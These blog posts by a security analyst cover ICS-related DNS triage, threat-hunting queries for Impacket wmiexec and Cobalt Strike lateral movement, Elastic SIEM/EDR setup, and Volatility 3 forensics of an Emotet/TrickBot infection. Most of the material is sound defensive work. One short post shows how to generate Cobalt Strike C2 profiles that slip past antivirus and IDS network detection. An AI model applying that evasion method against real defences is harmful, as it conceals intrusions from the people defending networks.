I recently had an interesting case, which involved some digging into SVCHost.exe and command line parameters parsed to it.
The Scenario
It started with an alert for a large number of DNS requests associated with an InfoStealer, ViperSoftx, from a user laptop. There were thousands of requests to the domains in a 90-minute period. Looking at the Endpoint telemetry available for the device, I could see the responsible process for the DNS requests was SVCHost.exe. This was an immediate red flag.
SVCHost.exe
SVCHost.exe is a key Windows Operating System Process, it helps host Windows Services and can load DLLs used by Shared Service Processes. Outbound connections to domains from SVCHost.exe aren’t terribly common (especially to malicious domains). Historically, SVCHost.exe has been a common process for malware to inject into / perform process hollowing on. This is typically because it’s a process that tends to load different DLLs, creates and starts services, and is a stable process to inject into.
Continued Triage
In our case, there was no evidence of process injection into SVCHost.exe and no evidence of any unusual DLLs loaded either. The infostealer that our domains had been previously associated with has also been around for a while, and its TTPs are well known. It does not typically inject into SVCHost.exe but rather sideloads a payload DLL into its own executable. It then uses PowerShell to download a 2nd stage, I had seen none of these TTPs.
The traffic patterns also did not make sense. There would be hundreds of requests to the domains in a 90-minute period, then the connections would stop. Only to continue again a few days later for another 40 minutes, then nothing. For an infected host, we’d expect to see constant beaconing.
Command Line Arguments
The endpoint telemetry for the SVCHost.exe process responsible for the connections had command line arguments parsed. The arguments were key to determining what had occurred. I’ve recreated the telemetry on my own host, and captured with Symon. I use the Swift on Security Sysmon Config.
Replicated Example
In the example below, I’m connecting to my own site and two other security blogs. Both that I highly recommend checking out:
This was the “aha” moment. What if it wasn’t our host that was infected, but another host sharing its internet connection? Internet Connection Sharing or ICS is essentially internet hotspotting. It allows you to share the internet connection on one device, with another.
This would also explain the start/stop nature of the C2 traffic. We’d only seen DNS requests from the SVCHost.exe hosting the ICS service, while the infected host was connected. During an ICS session, DNS requests from the remote host are essentially proxied through the svchost.exe process on our local host.
Confirming the Hypothesis
How can we know for sure that our hypothesis is correct? Well, some quick and dirty forensics is the answer.
I dumped the svchost.exe process responsible for the DNS requests (PID 12484).
A quick run of Strings across the .dmp, where I outputted the results into a .txt file.
strings 12484.dmp > svchost_strings.txt
Strings Output
# Copyright (c) 1993-2001 Microsoft Corp.
# This file has been automatically generated for use by Microsoft Internet
# Connection Sharing. It contains the mappings of IP addresses to host names
# for the home network. Please do not make changes to the HOSTS.ICS file.
# Any changes may result in a loss of connectivity between machines on the
# local network.
#192.168.137.246 vn-mon-99.mshome.net #
#192.168.137.1 LAPTOP-8FH6K397.mshome.net #
In the strings output, we can see the Internet Sharing session being established between our two hosts:
In addition to this, we can also see the domains that we beaconed out to, as well as other general host traffic, and SVCHost activity.
v10.events.data.microsoft.com
AMER08.azure-devices.net
AMER08.azure-devices.net
statics.teams.cdn.live.net
newtonpaul.com
v10.events.data.microsoft.com
gew1-spclient.spotify.com
lowery.tech
kmsec.uk
Inbound rule for Internet Connection Sharing to allow use of the IPv6 DHCP Server. [UDP 547]
Concluding Thoughts
With that, I was able to confirm that it wasn’t our initial host infected, but rather a personal host belonging to the user, connected via Internet Sharing.
That brings this mini-post to an end. Hopefully, if you encounter unusual DNS requests coming from svchost.exe with the ICS service loaded, you’ll save some time on triage.
You’d be forgiven for thinking that Threat Hunting is just another Cyber Buzz Word/Phrase spreading throughout the industry, the latest term used to push more product and managed services on a SOC. The reality, however, is that Threat Hunting is an extremely valuable skill and one that every SOC should have.
In fact, I believe that Threat Hunting provides more value than the traditional approach that many SOCs take. The traditional approach being switch on pre-made generic rules from a range of cyber tools like AV and IDS, as well as ingest IOCs from Intel Providers and search for them across the estate.
This typical approach would be what I call a reactive model. A team of analysts sit around waiting for alerts from different tools to trigger, they then triage the alerts and perform an investigation.
In my view, there are a few issues with this approach.
The issues
False Positives: Many generic alerts can be prone to false positives. Vendors design rules to work on many different estates. They’re not designed to work on your specific estate. Additionally, with IOCs, bad intel from a provider can generate a lot of noise on your estate.
Of course, rules can be tuned to perform better and cut false positive noise. But this is not always easy or even possible.
Additionally, false positives play a huge role in creating analyst fatigue. Investigating and closing the same false positives day after day will quickly cause analysts to become frustrated, and lose interest. Team productivity will drop as a result.
If analysts are used to closing false positives all the time, chances are they’ll wrongly close a true positive as a false positive for rules that are particularly noisy.
Detection Gaps: With a reactive approach, you’re sitting relying on the rules that you have to detect the full spectrum of malicious activity.
It requires you to have good detection coverage, but also requires you to have a complete picture of your detection coverage and your detection gaps.
Using frameworks like Mitre is incredibly useful for finding gaps in coverage. However, the reality is most SOCs do not have their coverage mapped to a framework.
Red Teams can help find gaps in detection coverage. However, most SOCs will only perform one Red Team a year, and a lot can change in a year.
A Different Approach
Some SOCs do already perform threat hunting on their estates, but in most cases this is conducted sporadically when there’s some free time. Free time can be hard to come by when you’re closing false positives all day.
What if instead of spending 90% of time reacting to alerts, the focus was switched to a proactive model? Or if 90% of the time was spent Threat Hunting instead. What impact would that have?
The Benefits
Assume Breach: Assume Breach is a common phrase in the industry. It’s a mentality that analysts are encouraged to have when triaging alerts, “assume there’s been a breach”. But sitting around waiting for alerts to come in doesn’t practice this mentality. However, with a Threat Hunting focused approach, you’re forced to hold this mentality, as you’re actively looking for threats and successful breaches.
Being Proactive: Being proactive and looking for threats is a better use of time than sitting around waiting for alerts to come in.
You’re not reliant on rules and detections you have, and you can hunt for activity where you have detection gaps.
Team Productivity: Analysts will be more productive. If they’re hunting for new and interesting activity each day, they’ll be more engaged and interested in their work.
Good research-based threat hunting takes skill, and analysts will develop their technical knowledge by conducting in-depth research before hunts.
Understanding Threat Hunting
So we now know the benfits of Threat Hunting, but what actually is it? And how can you do it?
Well, the first thing to make clear is that Threat Hunting is not taking a bunch of IPs and other IOCs and searching for them across your estate. Take a look at the pyramid below. It’s called the Pyramid of Pain. What this pyramid illustrates is the “pain” or effort an attacker will experience if you are able to detect an indicator in each block.
For example, if we were to take the tool Mimikatz as an example. If you detect Mimikatz based on its hash value it would be trivial for an attacker to change the value of the application, therefore, bypassing your detection. However, if you detected Mimikatz by looking for uncommon processes establishing a handle to LSASS, that would be significantly harder for an attacker to bypass. Additionally, you would also detect other attack tools which exploit LSASS.
Threat hunting should be focused on the top two blocks of the pyramid, TTPs and Tools.
Threat Hunt Model
There are an infinite amount of different threat hunting models available on the internet. But most of them are more or less the same. The typical model looks like this.
Research: This is one of the phases that I often see overlooked. This is what kicks off your threat hunt. Research can come from a variety of places, maybe you see a new POC for a tool being shared on Twitter. Or maybe you read a blog on a new attack vector. Regardless, this kick starts your research. From here, you dig deeper and investigate the attack vector.
Data and Telemetry: Once you have an understanding of the attack vector, you need to establish whether or not you have the correct data set to detect the threat. Whether it be proxy logs, endpoint logs, or something else.
Build Hypothesis: This is where you establish the logic of your hunt analytic. This stage is closely linked to the research phase. In my experience, the best way to build a hypothesis is to first test the attack vector. Build a lab and practice using the attack tool, or experiment with the attack vector. Once you’ve successfully experimented, review your logs. Observe what data was collected.
Create Hunt Analytic: Next you need to formulate your search. This is essentially where you test your hypothesis against your data & telemetry. A hunt analytic could be anything from a parent and child process relationship or maybe a specific filename and command line value.
Investigate and Incident Response: This obviously only occurs if you find some badness while hunting.
Tune Review Analytic: Here is where you improve your search to cut out the noise. Likewise, if it’s been turned into an automated analytic, refine it to cut out any false positives.
Let’s Get Technical – Demo
Let’s take a look at a threat hunting example by exploring some lateral movement techniques using Cobalt Strike and Impacket. Both of the techniques are not detected by some of the best EDRs on the market, which makes them a good candidate for Threat Hunts.
It’s worth bearing in mind that while EDRs are great tools that have really enhanced the detection capabilities of many organisations around the world, they’re not perfect. They can be bypassed and there are gaps in their coverage. You should never be reliant on just one security tool, and this again proves the value of threat hunting.
Testing Environment
The test environment is made up of two hosts, a desktop PC and a Domain Controller. A market-leading EDR (that shall remain nameless) is installed on the DC. Both hosts have Sysmon running on them with the SwiftOnSecurity Sysmon Config, and these logs are being fed into ELK.
If you’d like to see how to setup ELK SIEM, you can see my previous blog here.
Attackers Perspective
First, let’s paint the picture of what the attacker has done on our hosts, so it’s clearer what we’re threat hunting for.
User HR was sent a malicious link to a .hta file, which when opened, executes a malicious payload to spawn a Cobalt Strike Beacon running under the user’s context.
As the user does not have admin privileges, the attacker performed privilege escalation. This was done by uploading a secondary payload to the host (via the beacon) and executing it under escalated context using the fodhelper UAC bypass.
This gives us a new beacon running under a higher privileged context. From here, credentials on the host were dumped using Mimikatz via the beacon.
The next step is where we’re going to perform our lateral movement.
Before we do, it’s worth mentioning that a lot of the above activity would have been detected by most EDRs, but there are obviously other ways to achieve the same objectives which can go undetected.
The first method of lateral movement is using wmiexec from Impacket. Using the administrator’s credentials stolen with Mimikatz, we are able to get an interactive shell to the domain controller. Let’s see what using wmiexec looks like, and how we can detect it in a hunt.
WMIEXEC
As wmiexec is open source and the code is available on GitHub, one of the things we might do as part of our research phase is analyse the tools code. One part of the code that sticks out is the remote shell function. We can see here that cmd.exe is being launched, and is parsing flags “/Q /c “. We also know that WmiPrvSE.exe is likely to be the parent of cmd.exe, as it’s wmi we’re exploiting to establish our shell.
lass RemoteShell(cmd.Cmd):
.......................................
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = str('')
self.__shell = 'cmd.exe /Q /c '
self.__shell_type = shell_type
........................................
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
With that in mind, we can use a query like the one below, to search for cmd.exe as a child of wmiPrvSE.exe with the command line ” cmd.exe /Q /c” followed by a wildcard.
process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line : cmd.exe /Q /c *
Searching on this activity returned a few results, including this event.
There’s some interesting stuff here. Based on the command line it looks like a PowerShell command encoded in base64 is being executed, where the output of the command is then written to a temp file in an admin share.
We can use the writing of a file to an admin share to better improve our search query.
FYI, the use of wmiexec to launch PowerShell to then download a malicious executable went undetected by our EDR.
Hunt Performance
Our original query from before returned over 70 hits over a 30 day period on an estate with over 20,000 devices. That’s not bad, but we can improve our hunt query using the new information we now have.
process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line: \127.0.0.1\ADMIN$
Running the query above returned hits for only our attacker activity, nothing else. Making it a good hunt, we could probably turn this into a high confidence detection based on the 0% false-positive rate.
Lateral Movement with Cobalt Strike
Interestingly wmiexec isn’t the only attack tool that utilises the admin share. The “Jump” function that can be run from a Cobalt Strike beacon also writes a file into the admin share. If we look at the Lateral Movement (Spawn a Session) section of the Cobalt Strike Beacon Documentation we can see multiple functions that use the admin share.
If we look in our logs, we can see quite a few useful entries for the activity we can build hunts on.
Registry key added
We can see details of a registry key being added to the host as part of the creation of a new service.
There’s a separate event for the installation of a new service, again with our new executable included.
A service was installed in the system.
Service Name: 0134ebf
Service File Name: \GSOC-Lab-DC\ADMIN$\0134ebf.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
There’s a few things we could hunt for to find this activity in the future.
Creation of a new service where the service file name includes the admin share.
Creation of a registry key by services.exe which calls a file in the admin share.
Process creation of a file located in the admin share with services.exe as the parent.
File written to disk in the admin share where file name matches the following regex “.admin\$\/[a-zA-Z0-9]{7}\.exe$”
When Cobalt Strike writes a file to the admin share, it generates a random file name consisting of 7 alphanumerical characters. This regex I’ve created here may need to be modified depending on the regex flavour you use.
What you need to hunt
To develop an effective basic threat hunting function in your SOC you do not need much.
Mitre Mapping: I would recommend mapping your hunts to Mitre, this will help you keep track of which coverage gaps you have hunted in and which need more focus.
Plan: Plan your hunts. This saves analysts from hunting for the same things and duplicating work.
Talented Analysts: Threat hunting is not easy, and it takes time and skill to perform research and develop hunts from research. Give your analysts the time, freedom and resources to perform research and hunts.
Logs: Make sure you have the basic logs coming into your SIEM or Search Platform. Proxy logs, endpoint logs (whether EDR or Sysmon), Authentication logs, etc…
Alerting: Believe it or not, I’m not against alerting and use cases, just low-quality ones. For hunts that produce a very low false-positive rate, hunt logic can be used to create a detection alert. Alerting obviously plays an important role in any SOC and needs to work alongside threat hunting.
Closing Thoughts
At the beginning of this post, I said that SOCs should spend 90% of their time threat hunting and 10% of time dealing with alerts and tickets. This is obviously not realistic. But what I think every SOC should do is put more resources into research-based threat hunting, and use that process to create high confidence detections. I generally do think at least 60% of analysts’ time should be spent researching and threat hunting on the estate. I believe that this can have a lot more value than spending the majority of the time responding to low-quality false positives.
A well-devleoped Threat Hunting function will aim to automate hunts and generate threat leads for analysts to pick up and investigate. In my mind, this could be used in the place of generic, low-quality detections.
More to come…
I’ll be releasing another post soon on how you can take threat hunting to the next level, and how you can incorporate the Sqrrl Framework into improving your threat hunt capability. As well as how you can automate threat hunts with a SOAR.
I’ll also be releasing some mini-posts on creating detections for common attack tools like Cobalt Strike and Impacket.
In this mini-post, we’re going to look at how to easily bypass network detections for Cobalt Strike beacons. Many AV products like Symantec Endpoint Protection (SEP) have network detection capabilities that monitor traffic passing through a device’s network interface. Additionally IDS and IPS also have basic detections for C2 traffic. These detections are basically looking for specific patterns in network packets.
For popular tools like Cobalt Strike the basic “out-of-the-box” settings for Beacons are fingerprinted by vendors, and therefore going to be detected.
In Cobalt Strike, Malleable profiles are used to define settings for the C2. You have a choice of different protocols for your C2 with HTTP, HTTPS and DNS being three popular ones. HTTP Beacons are easily detectable, due to the payload being unencrypted. For HTTPS connections, detections occur on the certificate used for encryption.
Like with any exploitation tool, if you use the default values it’s likely you’ll be detected. There are Malleable profiles available on GitHub which can be used and these will change your C2 settings from the default. However, these have also been fingerprinted, and will also generate a detection. The profiles available on GitHub are more aimed at testing your detection capability of different APTs and CrimeWare C2s seen in the wild in the past.
The Solution
Luckily Cobalt Strike Malleable C2 profiles are highly customisable. In fact, customisation is one of the reasons why Cobalt Strike is so popular and also so effective. You could write your own profile and there are some guides online that show you how to do this.
However, there is an easier way, C2 Concealer. The tool, created by FortyNorth Security, was released last year and features a Python Script which will generate a C2 Profile based on a few variables defined by the user.
Demo
Installation is easy, just clone the GitHub repo, and run the install script.
Once the install is complete, run the script and define a hostname you wish to use.
C2concealer --hostname newtpaul.com --variant 1
Next, C2Concealer will scan your host to locate where c2lint is located. C2lint is a tool included with CobaltStrike which is used to test/troubleshoot profiles before they’re used.
Once the scanning is finished, you’ll be asked to choose an SSL option. Using a legit LetsEncrypt cert is obviously going to be the most effective at avoiding detection. However, that requires you to point the A record at your team sever. For the purposes of this, we’ll just use a self-signed cert.
You’ll be asked to fill out some basic information for the cert. It doesn’t matter too much what you put here.
Once it’s complete you should receive confirmation that the profile has passed the c2lint check. The name of the newly created profile will also be displayed.
Next, launch your team server, but this time defining the profile to load.
Generate a new listener and a new payload of your choice.
Before VS After
Before using our newly created profile, SEP blocked outbound connections to our Cobalt Strike team server. This was when using just the default C2 profile.
However, after using our newly created profile, nothing was blocked and we were able to successfully establish a C2.
Conclusion
And that brings this quick post to an end. I hope you found it useful! You can read a previous post I wrote on Cobalt Strike here.
A few months ago I released a couple of blog posts on how to create enterprise monitoring at home with ELK and Zeek. This post is a continuation of that series….sort of. A lot has changed since those posts, mainly updates to the ELK stack and the release of a number of free EDR tools. OpenEDR released by Comodo and Elastic EDR. So I thought now would be a good time to see what’s changed with Elastic, and try out their new EDR. So for this post, I’m going to show how to install Elastic SIEM and Elastic EDR from scratch.
Network Design
Below is a very simple network diagram for this post. ELK is running on a Ubuntu 20.04 Server hosted on ESXi. Zeek is also running on a Ubuntu 20.04 server, and a port on my switch is being mirrored to a port on my ESXi server. You can read more about Zeek and port mirroring in my previous blog here.
Also running on ESXi is a Windows 10 machine, where we will install the Elastic EDR agent. I also have a Windows AD machine. This host does not feature in this post but will be used in future posts where I perform additional testing with the Elastic EDR.
Installing ELK Basics
I’m going to breeze through this section, as I’ve covered it before, and there are tons of guides out there already on how to get a basic ELK setup working. In my case, I’m using the newest release of ELK which is 7.10.
For my ELK setup, I’m using a single Ubuntu Server 20.04 virtual machine running on ESXi. This server will run Elasticsearch and Kibana.
First install transport-https
apt-get install curl apt-transport-https
Next add the Elastic repositories to your source list.
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee /etc/apt/sources.list.d/elastic-7.x.list
Then update.
apt-get update
Now install Elasticsearch
apt-get install elasticsearch
Once Elasticsearch is installed, we need to make a couple of changes to its configuration file. This file is located in /etc/elasticsearch/elasticsearch.yml In order to access this file, you need root privileges.
First, we need to change the network.host value. Its default is set to the localhost. Change it to the IP address of the host you installed Elasticsearch onto.
network.host: <elasticsearch_ip>
Next within the same file, we need to change two node name values. In my case, I’ve just set both values to node-1
Now you should be ready to start Elasticsearch and check that it’s started correctly.
service elasticsearch start
service elasticsearch status
You can also check that Elasticsearch is accessible from other hosts by running:
curl http://<elasticsearch_ip>:9200
The output should look similar to the one below, (Disclosure: this pic is stolen from my previous ELK post, hence why the details don’t match my new deployment)
Installing Kibana
Run the command below to install Kibana.
apt-get install kibana
Once the installation is complete, edit your /etc/kibana/kibana.yml and specify the IP address hosting Kibana.
server.host: "Your_IP"
In the same file, also specify the IP address of your Elastic Instance.
Filebeat is used to ship data from devices to Elasticsearch. There are a number of different Filebeat modules for different products that send logs and data to Elasticsearch in the required format. In this example, we’re using the module for Zeek, but Elastic has greatly expanded it’s support for additional products in recent months, including AWS, CrowdStrike, ZScaler and more.
For now, we’re just going to install Filebeat on our host running Zeek, we’ll worry about configuring it later.
apt-get install filebeat
Configuring X-Pack
As it stands, the only functionality we have within our ELK deployment is log ingestion and visualisation. We can ingest logs into ElastiSearch, and manipulate the data with Kibana visualisations, but the core functionality of a SIEM is missing. We’re unable to build detections or use cases. This feature is not available “out of the box” and in order to use it, we must first configure security between all of our different nodes. X-Pack is the Elastic package which is basically responsible for all Elastic Security functionality.
One key component that is required is to configure SSL connections between each node, there are a number of ways to do this. We are going to use X-Pack to do this as well.
Firstly, on the host with Elasticsearch installed, we need to create a YAML file, /usr/share/elasticsearch/instances.yml which is going to contain the different nodes/instances that we want to secure with SSL. In my case, I only have Elasticsearch, Kibana and Zeek.
Now we’re going to repeat the process but this time for Kibana. The configuration is slightly different for Kibana.
Again, move your certificates to the correct folder and set the correct permissions.
Note: The following steps are assuming you are running a standalone ELK configuration. If you are running a distributed deployment, you’ll need to move certificates to the appropriate hosts.
Next, in your file /etc/kibana/kibana.yml add the settings for SSL between Elasticsearch and Kibana.
# The URLs of the Elasticsearch instances to use for all your queries.
elasticsearch.hosts: ["https://192.168.1.232:9200"]
elasticsearch.ssl.certificateAuthorities: ["/etc/kibana/certs/ca/ca.crt"]
elasticsearch.ssl.certificate: "/etc/kibana/certs/kibana.crt"
elasticsearch.ssl.key: "/etc/kibana/certs/kibana.key"
And then in the same file, add the configuration between Kibana and your browser.
# These settings enable SSL for outgoing requests from the Kibana server to the browser.
server.ssl.enabled: true
server.ssl.certificate: "/etc/kibana/certs/kibana.crt"
server.ssl.key: "/etc/kibana/certs/kibana.key"
Then, restart Kibana.
service kibana restart
Configuring Beats (Zeek) SSL
For the next step, we need to configure SSL for our host running Zeek and Beats. If you’re not running Zeek or any other product that uses a Filebeats module like Suricata, Windows Event Log, etc.. then you can skip this step.
First copy your certificates over to your host running Zeek, then create the cert directories with the correct permissions. You’ll need to copy both the Zeek certificates and the CA certificate.
Now you can check that FileBeats is able to contact Elastic by running the command below. Everything should return back “ok”.
filebeat test output
Adding Authentication
We also need to add authentication to Elastic. This is pretty easy to do. Firstly enabled X-Pack by editing your /etc/elasticsearch/elasticsearch.yml
# X-Pack Setting
xpack.security.enabled: true
Next, we need to generate passwords for all of our built-in Elastic roles and users. There’s a tool included with Elasticsearch to do this. Run the command below to generate these passwords and save them somewhere safe (password manager). We’ll be using the Elastic password for the next part.
/usr/share/elasticsearch/bin/elasticsearch-setup-passwords auto
Next, add the newly created Elastic credential to your Filebeat config file, /etc/filebeat/filebeat.yml
You should now see a login box when you navigate to your Kibana IP address.
Adding data to Elasticsearch
So we now have everything set up, the next thing we need to do is start ingesting data into Elasticsearch. In my case, I’m going to be using Zeek to tap my network traffic. I’ve already covered how to do this in my previous two blogs so I’m not going to cover it again here.
And to see how to configure the Filebeat Zeek module, read from “Configuring Zeek” in my part 2 blog here.
Enabling Detections
Once you have completed all the above steps, and have data ingesting into Elastic, you will probably notice that you are still unable to create detections. There is one final step to complete. Edit your Kibana config file, /etc/kibana/kibana.yml and add a xpack.encryptedSavedObjects.encryptionKey. I believe this can be any 32 character string.
You should now be able to view the built-in detection rules and create your own. We’ll look at how to create rules in another future post.
Installing Elastic EDR Agent
Now we’re ready to install Elastic EDR First, navigate to the “Fleet” dashboard by clicking on the link under the management tab located on the side menu.
From the fleet management menu, click “add agent”. Now it’s likely that you’ll be requested to add an integration policy before you can install agents, just follow the wizard and keep the defaults.
We’re going to use the “Enroll in Fleet” option to install the EDR.
First, download the Elastic Agent onto your Windows/Linux Host.
Once you have the agent downloaded, keep the default policy selected under the Agent policy.
Before moving onto Step 3 we have another step to complete first.
If we were to install the agent onto our Windows host now, we would receive an error that our self-signed certificate is from an untrusted source, and our agent install would fail.
So what we need to do is to add our CA certificate as a trusted certificate on our Windows host.
Install Certificates
First search for “Local Security Policy” in your Windows search bar. Then go to Security Settings > Public Key Policies > Certificate Path Validation Settings
Then, check the Define these policy settings and also check Allow user trusted root CAs to be used to validate certificates and Allow users to trust peer trust certificates options if they’re not already selected.
Finally check Third-Party Root CAs and Enterprise Root CAs.
Click apply and ok.
Next search for certmgr.msc in the Windows Search Bar.
Then go to Trusted Root Certification Authorities > Certificates and right-click anywhere in the whitespace and select All Tasks > Import
Then simple follow the wizard and select the CA.crt we created earlier.
Install the Agent
Now we’re ready to install the Elastic Agent. Copy the install command from the Fleet Dashboard and run it with PowerShell on your Windows host where the agent is located.
If all has gone right, you should see the agent has been successfully enrolled via the fleet dashboard.
We’re not done yet however, we need to check that data is being ingested correctly into ElasticSearch from our agent. You can do this by navigating to the Data Streams tab. You should see this populated with endpoint data. If there is no data here, check your fleet settings by clicking the settings cog in the top right corner. Ensure that your ElasticSearch settings are properly set to the correct IP and not set to LocalHost.
Finally, we need to enable detection rules for our EndPoint agent. Go to the detections dashboard in the Kibana Security app, and “enable” any endpoint rules you want.
Now you can test that it works, perform some badness on your Windows host and see what happens! In my case, Elastic EDR successfully detected and prevented both the Mimikatz files and also the process execution of Mimikatz.
We can also see this in our Kibana Security Detections Dashboard.
And we can also dive a little deeper with a nice little process try graphic, and overview of the event. Very cool!
Conclusion
And so that brings this post to an end, I hope you’ve found it useful. So far with the limited testing I have done, I have found Elastic’s EDR to be impressive. It has the look and feel of an Enterprise-grade tool, which considering its open-source, is amazing. I plan to do some more thorough testing in the future to see how it performs, but as it stands it certainly seems to be leading EDR in the open-source world. It would be my go-to recommendation for small to medium businesses who may not have the budget for other expensive tools. The question is, can it give the big paid tools a run for their money.
In this post, we’re going to take a look at Volatility 3, the newest version of the industries most popular memory forensics tool (within the open-source community at least).
We have a memory dump from an infected host that we’re going to look at and compare how the newest version of the tool performs as opposed to volatility 2. Let’s get started!
Install Volatility
Firstly we need to install a couple of dependencies, Python3 and Pefile. I’ve installed Python 3.8.6 from here.
When installing Python, make sure you tick the box “Add Python 3.8 to PATH” if you do not want to add the PATH manually.
Follow the default instructions to complete the installation.
Next, we need to install PEFile. I installed PEFile using pip.
pip install pefile
I installed version 2019.4.18 which you can find here.
These are the only two “required” dependencies that volatility requires, so we can now move on to install volatility.
I used git to download volatility, you can download git from here if you do not already have it installed. Once installed, launch Git Bash and run the command
The package should be cloned into a folder called volatility 3, which by default will be located in your user folder. So in my case, it’s C:\Users\paul\volatility3
We can now check if volatility has been installed properly by navigating to our volatility3 folder in CMD and running the command.
python vol.py -h
If all has gone right, we should see an output like the following:
This means that we’re now ready to use volatility to analyse our memory dump.
Using Volatility
Anyone who like myself is used to using Volatility 2 will notice that there are immediately some obvious changes with Volatility 3. Firstly, profiles are gone so you no longer have to scan a memory dump to find out which OS profile it’s compatible with. YAY 🙂
The way in which plugins are called in the command line is also slightly different. For example, if we want to run the plugin pslist to display the running processes in a memory image, we would do so by specifying the plugin name windows.pslist.PsList
Let’s give that a try now!
Top Tip: It’s good practice to record the output of volatility into txt files. That way we can easily go back and read through the results instead of having to try and read everything via the command line. I’ve created a new folder called evidence, and the results from each plugin run will be written to txt files in there.
To run the pslist plugin we’re going to run the following command:
Let’s break this command down to understand what it’s doing. Firstly, we’re telling Python to run our volatility script called vol.py. Then we’re using the -f flag to specify the location of our memory dump file. Next, we’re specifying the name of the plugin we want to run, and finally, we’re using the > flag to say that we want the results to be written out to a txt file called pslist which will be written to our evidence folder.
This is the basic command line format that we’re going to need to use for most plugins. Let’s go ahead and run some of the core plugins to gather some basic information. We’re going to run:
pslist – gives us a list of running processes.
pstree – gives us the same information as pslist, however, displays the output in a process tree so we can see child and parent process relationships.
netscan – gives us open network connections.
Processes
If we look at the output from running pslist below, there are a couple of processes that catch my eye, firstly Microsoft Word. As we know, Microsoft Office applications like Word and Excel are commonly used to distribute malware usually by using a malicious macro or embedded file. The Emotet campaign is particularly well known for using these methods.
The other application that catches my eye is fphc.exe. This is not an application that I am familiar with and does not look to be a Windows application. Basically, it looks weird.
Running pstree does not give us anything else of interest. WinWord.exe has a parent of explorer.exe which is to be expected. While our other application of interest, fphc.exe has a Parent Process ID (PPID) of 5668. However, there is no application that has this PID in the recorded pslist output. This likely means that our fphc.exe is an orphan process.
We can perform basic OSINT on the IPs returned below using tools like VirusTotal. Many of the IP addresses appear to belong to Microsoft, specifically Azure.
When searching on the Microsft IP addresses, none of them returns any “detection” hits. However, if we look in the “relations” tabs and look at communicating files, we can see many hits on malicious word documents that have called out to some of the IPs we’ve seen. If we draw a threat graph, like the one below, we can see an example of a malicious document that has been associated with the Microsoft IP 52.114.132.91.
It can often be difficult to determine if connections to cloud services like Azure and AWS are malicious or not, due to the fact that IP addresses are shared and reused by different users. It’s a good place for malware authors to hide their attack infrastructure and attempt to blend in with legitimate traffic.
Aside from the Microsoft IP addresses, there were also two other addresses from netscan which are of significant interest.
62.108.35.36 185.99.2.123
Both of these addresses returned detection hits on VirusTotal. Additional OSINT links both of these IP to TrickBot infrastructure. TrickBot is a well-known banking trojan that has been around for several years now. It is commonly distributed via Emotet.
Digging Deeper
We’ve seen a few things now which make us suspect that TrickBot malware has been delivered onto the host via an Emotet. Now we need to try and confirm that this is what has occurred.
Firstly let’s look to see if PowerShell was used by a Macro to download malware as can commonly be the case. We can use the command cmdline to list process command line arguments.
Unfortunately, there were no interesting PowerShell commands in the results. In Volatility 2, we had the option to use the plugins “cmdscan” and “console” as well as the third-party plugins which try to locate interesting Powershell activity in memory. We’re a little more limited with Volatility 3 as we only have the “cmdline” command.
However, cmdline still did return some useful pieces of informatiuon.
We have the name of the Word Document that was opened by the user:
In volatility 2, we were able to use the “dumpfiles” plugin to dump files from memory. However, that seems to no longer be an option in Volatility 3. We can, however, dump a running process by using the pslist command with a dump flag. Using the command below we can dump fphc.exe to analyse.
We still need to obtain the Word Document, but this is going to be difficult without being able to dump individual files. What we could do is dump the WinWord.exe process and try to carve the file out. This is a lot of effort though for what is likely to be commodity malware. So instead we’re going to cheat and just pull the file directory from the host now that we know the path that it’s located in. You could also do OSINT on the filename and try to find a copy on VT or AnyRun to download.
Emotet Analysis
As expected, the document contained a malicious VBS macro, which launches PowerShell with a base64 encoded command. I used CyberChef to decode the text from Base64 and also decoded the text from UTF-16LE (1200). Below we have the obfuscated PowerShell command:
I performed some basic deobfuscation of the code, which I’m not going to go into in this post. I have written how to deobfuscate Emotet Powershell in a previous post here.
Below is a rough deobfuscation of the PowerShell. We can see the script tries to download the file I3d47K.exe into the user’s directory from one of the URLs contained in the site list. A check of the file size of the downloaded file is performed to ensure that the file was properly downloaded, and if it passes that check, the file is then executed.
It’s interesting that we have not seen any sign of the executable I3d47k.exe within any of our Volatility outputs. It’s likely that this executable either drops fphc.exe or is renamed to this.
Executable Analysis
OSINT on our dumped application fphc.exe identifies it as Emotet, as expected. Dynamic analysis on the executable however has shown that it fails to execute properly. We see werfault.exe executed as a result of the application crash. It is possible for malware like TrickBot and Emotet to inject into WerFault. However, when this happens the command line for the process is usually empty, but in our case, we have flags being parsed. Additionally, we’re presented with a crash error, and there is no other typical Emotet activity.
There are a few reasons as to why the malware is not executing properly and the most likely is due to an error when dumping it from memory.
Review of Volatility 3
We’ve been able to build a rough picture of what has occurred on the host, but our analysis is not as complete as I would like. In forensics, you aim to build as clear a picture as possible, and in this case, there are definitely some gaps in our timeline of what’s happened. There was some information missing from our evidence collected with Volatility, but this can often occur in memory forensics as the data we’re dealing with is…..volatile.
The lack of plugins for Vol 3 is something that makes me still favour Vol 2. This will change over time though. As the tool is adopted more widespread, additional plugins will be developed. The Volatility Foundation’s annual plugin competition will from this year be focused on Volatility 3, and with official support for Volatility 2 ending in 2021, it’s only a matter of time before more users move to the newer version and the tool improves.
The two main things that Volatility 3 has going for it is its speed (it’s a huge improvement on Vol 2) and that it is now easier for developers to use the codebase to develop new plugins. The move away from OS profiles is also a welcome addition, as is it’s support for a larger variety of OS versions.
Volatility 3 Plugins
Here’s a list of the different Volatility 3 Plugins for Windows. Don’t forget there are also Mac and Linux plugins too.
Today we’re going to look at a malware campaign made up of multiple stages, with the end goal of establishing a C2 connection to a Cobalt Strike server. There are a few cool techniques that this campaign uses that we’re going to look at. I happened to come across the initial first stage phishing attachment while browsing for samples on VirusTotal and found it interesting as you do not commonly see JNLP attachments used for phishing. So, let’s get started.
Stage 1: Attachment Analysis
A JNLP file is a java web file, which when clicked, the application javaws.exe will attempt to load and execute the file. Javaws.exe is an application that is part of the Java Runtime Environment and is used to give internet functionality to java applications. JNLP files can be used to allow for applications hosted on a remote server to be launched locally. It is worth noting that to be susceptible to phishing via a JNLP the user will have to have java installed on their machine.
